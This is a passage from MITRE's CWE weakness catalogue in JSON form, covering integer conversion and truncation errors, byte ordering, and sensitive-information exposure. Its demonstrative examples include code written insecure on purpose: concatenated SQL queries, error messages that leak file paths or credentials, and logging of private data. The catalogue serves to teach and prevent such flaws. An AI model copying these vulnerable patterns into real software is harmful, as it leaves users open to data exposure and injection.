Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Demonstrative_Examples, References"}]}},"196":{"attr":{"@_ID":"196","@_Name":"Unsigned to Signed Conversion Error","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software uses an unsigned primitive and performs a cast to a signed primitive, which can produce an unexpected value if the value of the unsigned primitive can not be represented using a signed primitive.","Extended_Description":"Although less frequent an issue than signed-to-unsigned conversion, unsigned-to-signed conversion can be the perfect precursor to dangerous buffer underwrite conditions that allow attackers to move down the stack where they otherwise might not have access in a normal buffer overflow condition. Buffer underwrites occur frequently when large unsigned values are cast to signed values, and then used as indexes into a buffer or for pointer arithmetic.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"124","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"120","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Medium","Common_Consequences":{"Consequence":[{"Scope":"Availability","Impact":"DoS: Crash, Exit, or Restart","Note":"Incorrect sign conversions generally lead to undefined behavior, and therefore crashes."},{"Scope":"Integrity","Impact":"Modify Memory","Note":"If a poor cast lead to a buffer overflow or similar condition, data integrity may be affected."},{"Scope":["Integrity","Confidentiality","Availability","Access Control"],"Impact":["Execute Unauthorized Code or Commands","Bypass Protection Mechanism"],"Note":"Improper signed-to-unsigned conversions without proper checking can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program\'s implicit security policy."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Choose a language which is not subject to these casting flaws."},{"Phase":"Architecture and Design","Description":"Design object accessor functions to implicitly check values for valid sizes. Ensure that all functions which will be used as a size are checked previous to use as a size. If the language permits, throw exceptions rather than using in-band errors."},{"Phase":"Implementation","Description":"Error check the return values of all functions. Be aware of implicit casts made, and use unsigned variables for sizes if at all possible."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Unsigned to signed conversion error"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"92"}}},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Type Conversions&#34;, Page 223"}},{"attr":{"@_External_Reference_ID":"REF-18"}}]},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Demonstrative_Examples, Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated References"}]}},"197":{"attr":{"@_ID":"197","@_Name":"Numeric Truncation Error","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Truncation errors occur when a primitive is cast to a primitive of a smaller size and data is lost in the conversion.","Extended_Description":"When a primitive is cast to a smaller primitive, the high order bits of the large value are lost in the conversion, potentially resulting in an unexpected value that is not equal to the original value. This value may be required as an index into a buffer, a loop iterator, or simply necessary state data. In any case, the value cannot be trusted and the system will be in an undefined state. While this method may be employed viably to isolate the low bits of a value, this usage is rare, and truncation usually implies that an implementation error has occurred.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1305","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"681","@_View_ID":"1340","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"195","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"196","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"192","@_View_ID":"1000"}},{"attr":{"@_Nature":"CanAlsoBe","@_CWE_ID":"194","@_View_ID":"1000"}}]},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Java","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C#","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Likelihood_Of_Exploit":"Low","Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Modify Memory","Note":"The true value of the data is lost and corrupted data is used."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Implementation","Description":"Ensure that no casts, implicit or explicit, take place that move from a larger size primitive or a smaller size primitive."}},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"This example, while not exploitable, shows the possible mangling of values associated with truncation errors:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int intPrimitive;short shortPrimitive;intPrimitive = (int)(~((int)0) ^ (1 &lt;&lt; (sizeof(int)*8-1)));shortPrimitive = intPrimitive;printf(\\"Int MAXINT: %d\\\\nShort MAXINT: %d\\\\n\\", intPrimitive, shortPrimitive);","xhtml:br":["","","",""]}},{"attr":{"@_Nature":"result"},"xhtml:div":{"#text":"Int MAXINT: 2147483647Short MAXINT: -1","xhtml:br":""}}],"Body_Text":["The above code, when compiled and run on certain systems, returns the following output:","This problem may be exploitable when the truncated value is used as an array index, which can happen implicitly when 64-bit values are used as indexes, as they are truncated to 32 bits."]},{"Intro_Text":"In the following Java example, the method updateSalesForProduct is part of a business application class that updates the sales information for a particular product. The method receives as arguments the product ID and the integer amount sold. The product ID is used to retrieve the total product count from an inventory object which returns the count as an integer. Before calling the method of the sales object to update the sales count the integer values are converted to The primitive type short since the method requires short type for the method arguments.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...public void updateSalesForProduct(String productID, int amountSold) {}...","xhtml:br":["","",""],"xhtml:i":"// update sales database for number of product sold with product ID","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int productCount = inventory.getProductCount(productID);short count = (short) productCount;short sold = (short) amountSold;sales.updateSalesCount(productID, count, sold);","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get the total number of products in inventory database","// convert integer values to short, the method for the","// sales object requires the parameters to be of type short","// update sales database for product"]}}}},{"attr":{"@_Nature":"good","@_Language":"Java"},"xhtml:div":{"#text":"...public void updateSalesForProduct(String productID, int amountSold) {}...","xhtml:br":["","",""],"xhtml:i":"// update sales database for number of product sold with product ID","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"int productCount = inventory.getProductCount(productID);if ((productCount &lt; Short.MAX_VALUE) &amp;&amp; (amountSold &lt; Short.MAX_VALUE)) {else {}","xhtml:br":["","","","","","","","",""],"xhtml:i":["// get the total number of products in inventory database","// make sure that integer numbers are not greater than","// maximum value for type short before converting","// throw exception or perform other processing"],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"short count = (short) productCount;short sold = (short) amountSold;sales.updateSalesCount(productID, count, sold);","xhtml:br":["","","","","","",""],"xhtml:i":["// convert integer values to short, the method for the","// sales object requires the parameters to be of type short","// update sales database for product"]}},{"#text":"...","attr":{"@_style":"margin-left:10px;"}}]}}}}],"Body_Text":"However, a numeric truncation error can occur if the integer values are higher than the maximum value allowed for the primitive type short. This can cause unexpected results or loss or corruption of data. In this case the sales database may be corrupted with incorrect data. Explicit casting from a from a larger size primitive type to a smaller size primitive type should be prevented. The following example an if statement is added to validate that the integer values less than the maximum value for the primitive type short before the explicit cast and the call to the sales method."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2009-0231","Description":"Integer truncation of length value leads to heap-based buffer overflow.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0231"},{"Reference":"CVE-2008-3282","Description":"Size of a particular type changes for 64-bit platforms, leading to an integer truncation in document processor causes incorrect index to be generated.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3282"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Numeric truncation error"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Truncation error"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO34-C","Entry_Name":"Distinguish between characters read from a file and EOF or WEOF","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FLP34-C","Entry_Name":"Ensure that floating point conversions are within range of the new type","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT02-C","Entry_Name":"Understand integer conversion rules"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT05-C","Entry_Name":"Do not use input functions to convert character data if they cannot handle all possible inputs"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"INT31-C","Entry_Name":"Ensure that integer conversions do not result in lost or misinterpreted data","Mapping_Fit":"CWE More Abstract"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"NUM12-J","Entry_Name":"Ensure conversions of numeric types to narrower types do not result in lost or misinterpreted data"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP1","Entry_Name":"Glitch in computation"}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 6, &#34;Truncation&#34;, Page 259"}}},"Notes":{"Note":{"#text":"This weakness has traditionally been under-studied and under-reported, although vulnerabilities in popular software have been published in 2008 and 2009.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Description, Observed_Examples, Other_Notes, Research_Gaps"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}]}},"198":{"attr":{"@_ID":"198","@_Name":"Use of Incorrect Byte Ordering","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software receives input from an upstream component, but it does not account for byte ordering (e.g. big-endian and little-endian) when processing the input, causing an incorrect number or value to be used.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"188","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State"}},"Detection_Methods":{"Detection_Method":{"Method":"Black Box","Description":"Because byte ordering bugs are usually very noticeable even with normal inputs, this bug is more likely to occur in rarely triggered error conditions, making them difficult to detect using black box methods."}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Numeric Byte Ordering Error"},{"attr":{"@_Taxonomy_Name":"The CERT Oracle Secure Coding Standard for Java (2011)"},"Entry_ID":"FIO12-J","Entry_Name":"Provide methods to read and write little-endian data"}]},"Notes":{"Note":{"#text":"Under-reported.","attr":{"@_Type":"Research Gap"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Detection_Factors, Relationships, Research_Gaps, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Taxonomy_Mappings"}],"Previous_Entry_Name":{"#text":"Numeric Byte Ordering Error","attr":{"@_Date":"2008-04-11"}}}},"200":{"attr":{"@_ID":"200","@_Name":"Exposure of Sensitive Information to an Unauthorized Actor","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information.","Extended_Description":{"xhtml:p":["There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker.  Some kinds of sensitive information include:","Information might be sensitive to different parties, each of which may have their own expectations for whether the information should be protected.  These parties include:","Information exposures can occur in different ways:","It is common practice to describe any loss of confidentiality as an \\"information exposure,\\" but this can lead to overuse of CWE-200 in CWE mapping. From the CWE perspective, loss of confidentiality is a technical impact that can arise from dozens of different weaknesses, such as insecure file permissions or out-of-bounds read.  CWE-200 and its lower-level descendants are intended to cover the mistakes that occur in behaviors that explicitly manage, store,  transfer, or cleanse sensitive information."],"xhtml:div":[{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["private, personal information, such as personal messages, financial data, health records, geographic location, or contact details","system status and environment, such as the operating system and installed packages","business secrets and intellectual property","network status and configuration","the product\'s own code or internal state","metadata, e.g. logging of connections or message headers","indirect information, such as a discrepancy between two internal operations that can be observed by an outsider"]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["the product\'s own users","people or organizations whose information is created or used by the product, even if they are not direct product users","the product\'s administrators, including the admins of the system(s) and/or networks on which the product operates","the developer"]}},{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":[{"#text":"the codesensitive information into resources or messages that are intentionally made accessible to unauthorized actors, but should not contain the information - i.e., the information should have been \\"scrubbed\\" or \\"sanitized\\"","xhtml:b":"explicitly inserts"},{"#text":"a different weakness or mistakethe sensitive information into resources, such as a web script error revealing the full system path of the program.","xhtml:b":"indirectly inserts"},{"#text":"the code manages resources that intentionally contain sensitive information, but the resources areto unauthorized actors. In this case, the information exposure is resultant - i.e., a different weakness enabled the access to the information in the first place.","xhtml:b":"unintentionally made accessible"}]}}]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":[{"Ordinality":"Primary","Description":"Developers may insert sensitive information that they do not believe, or they might forget to remove the sensitive information after it has been processed"},{"Ordinality":"Resultant","Description":"Separate mistakes or weaknesses could inadvertently make the sensitive information available to an attacker, such as in a detailed error message that can be read by an unauthorized party"}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Mobile","@_Prevalence":"Undetermined"}}},"Alternate_Terms":{"Alternate_Term":[{"Term":"Information Disclosure","Description":"This term is frequently used in vulnerability advisories to describe a consequence or technical impact, for any vulnerability that has a loss of confidentiality. Often, CWE-200 can be misused to represent the loss of confidentiality, even when the mistake - i.e., the weakness - is not directly related to the mishandling of the information itself, such as an out-of-bounds read that accesses sensitive memory contents; here, the out-of-bounds read is the primary weakness, not the disclosure of the memory.  In addition, this phrase is also used frequently in policies and legal documents, but it does not refer to any disclosure of security-relevant information."},{"Term":"Information Leak","Description":"This is a frequently used term, however the \\"leak\\" term has multiple uses within security. In some cases it deals with the accidental exposure of information from a different weakness, but in other cases (such as \\"memory leak\\"), this deals with improper tracking of resources, which can lead to exhaustion. As a result, CWE is actively avoiding usage of the \\"leak\\" term."}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Detection_Methods":{"Detection_Method":[{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Inter-application Flow Analysis"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner","Database Scanners"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer","Automated Monitored Execution","Monitored Virtual Environment - run potentially malicious code in sandbox / wrapper / virtual machine, see if it does anything suspicious"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Context-configured Source Code Weakness Analyzer"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Source code Weakness Analyzer"}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Attack Modeling","Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"]}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":{"attr":{"@_Mitigation_ID":"MIT-46"},"Phase":"Architecture and Design","Strategy":"Separation of Privilege","Description":{"xhtml:p":["Compartmentalize the system to have \\"safe\\" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area.","Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges."]}}},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-38"},"Intro_Text":"The following code checks validity of the supplied username and password and notifies the user of a successful or failed login.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"my $username=param(\'username\');my $password=param(\'password\');if (IsValidUsername($username) == 1){}else{}","xhtml:br":["","","","","",""],"xhtml:div":[{"#text":"if (IsValidPassword($username, $password) == 1){}else{}","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","",""],"xhtml:div":[{"#text":"print \\"Login Successful\\";","attr":{"@_style":"margin-left:10px;"}},{"#text":"print \\"Login Failed - incorrect password\\";","attr":{"@_style":"margin-left:10px;"}}]},{"#text":"print \\"Login Failed - unknown username\\";","attr":{"@_style":"margin-left:10px;"}}]}},{"attr":{"@_Nature":"result"},"xhtml:div":"\\"Login Failed - incorrect username or password\\""}],"Body_Text":["In the above code, there are different messages for when an incorrect username is supplied, versus when the username is correct but the password is wrong. This difference enables a potential attacker to understand the state of the login function, and could allow an attacker to discover a valid username by trying different values until the incorrect password message is returned. In essence, this makes it easier for an attacker to obtain half of the necessary authentication credentials.","While this type of information may be helpful to a user, it is also useful to a potential attacker. In the above example, the message for both failed cases should be the same, such as:"]},{"attr":{"@_Demonstrative_Example_ID":"DX-118"},"Intro_Text":"This code tries to open a database connection, and prints any exceptions that occur.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"try {}catch (Exception $e) {}","xhtml:div":[{"#text":"openDbConnection();","attr":{"@_style":"margin-left:10px;"}},{"#text":"echo \'Caught exception: \', $e-&gt;getMessage(), \'\\\\n\';echo \'Check credentials in config file at: \', $Mysql_config_location, \'\\\\n\';","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}],"xhtml:br":["",""],"xhtml:i":"//print exception message that includes exception message and configuration file location"}},"Body_Text":"If an exception occurs, the printed message exposes the location of the configuration file the script is using. An attacker can use this information to target the configuration file (perhaps exploiting a Path Traversal weakness). If the file can be read, the attacker could gain credentials for accessing the database. The attacker may also be able to replace the file with a malicious one, causing the application to use an arbitrary database."},{"attr":{"@_Demonstrative_Example_ID":"DX-119"},"Intro_Text":"In the example below, the method getUserBankAccount retrieves a bank account object from a database using the supplied username and account number to query the database. If an SQLException is raised when querying the database, an error message is created and output to a log file.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"public BankAccount getUserBankAccount(String username, String accountNumber) {}","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"BankAccount userAccount = null;String query = null;try {} catch (SQLException ex) {}return userAccount;","xhtml:br":["","",""],"xhtml:div":[{"#text":"if (isAuthorizedUser(username)) {}","attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"query = \\"SELECT * FROM accounts WHERE owner = \\"+ username + \\" AND accountID = \\" + accountNumber;DatabaseManager dbManager = new DatabaseManager();Connection conn = dbManager.getConnection();Statement stmt = conn.createStatement();ResultSet queryResult = stmt.executeQuery(query);userAccount = (BankAccount)queryResult.getObject(accountNumber);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","","","",""]}},{"#text":"String logMessage = \\"Unable to retrieve account information from database,\\\\nquery: \\" + query;Logger.getLogger(BankManager.class.getName()).log(Level.SEVERE, logMessage, ex);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":""}]}}}},"Body_Text":"The error message that is created includes information about the database query that may contain sensitive information about the database or query logic. In this case, the error message will expose the table name and column names used in the database. This data could be used to simplify other attacks, such as SQL injection (CWE-89) to directly access the database."},{"attr":{"@_Demonstrative_Example_ID":"DX-120"},"Intro_Text":"This code stores location information about the current user:","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"locationClient = new LocationClient(this, this, this);locationClient.connect();currentUser.setLocation(locationClient.getLastLocation());catch (Exception e) {}","xhtml:br":["","","","",""],"xhtml:i":"...","xhtml:div":{"#text":"AlertDialog.Builder builder = new AlertDialog.Builder(this);builder.setMessage(\\"Sorry, this application has experienced an error.\\");AlertDialog alert = builder.create();alert.show();Log.e(\\"ExampleActivity\\", \\"Caught exception: \\" + e + \\" While on User:\\" + User.toString());","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["","","",""]}}},"Body_Text":"When the application encounters an exception it will write the user object to the log. Because the user object contains location information, the user\'s location is also written to the log."},{"attr":{"@_Demonstrative_Example_ID":"DX-129"},"Intro_Text":"The following is an actual MySQL error statement:","Example_Code":{"attr":{"@_Nature":"result","@_Language":"SQL"},"xhtml:div":"Warning: mysql_pconnect(): Access denied for user: \'root@localhost\' (Using password: N1nj4) in /usr/local/www/wi-data/includes/database.inc on line 4"},"Body_Text":"The error clearly exposes the database credentials."},{"attr":{"@_Demonstrative_Example_ID":"DX-130"},"Intro_Text":"This code displays some information on a web page.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":"Social Security Number: &lt;%= ssn %&gt;&lt;/br&gt;Credit Card Number: &lt;%= ccn %&gt;"},"Body_Text":"The code displays a user\'s credit card and social security numbers, even though they aren\'t absolutely necessary."},{"attr":{"@_Demonstrative_Example_ID":"DX-131"},"Intro_Text":"The following program changes its behavior based on a debug flag.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"JSP"},"xhtml:div":{"#text":"&lt;% if (Boolean.getBoolean(\\"debugEnabled\\")) 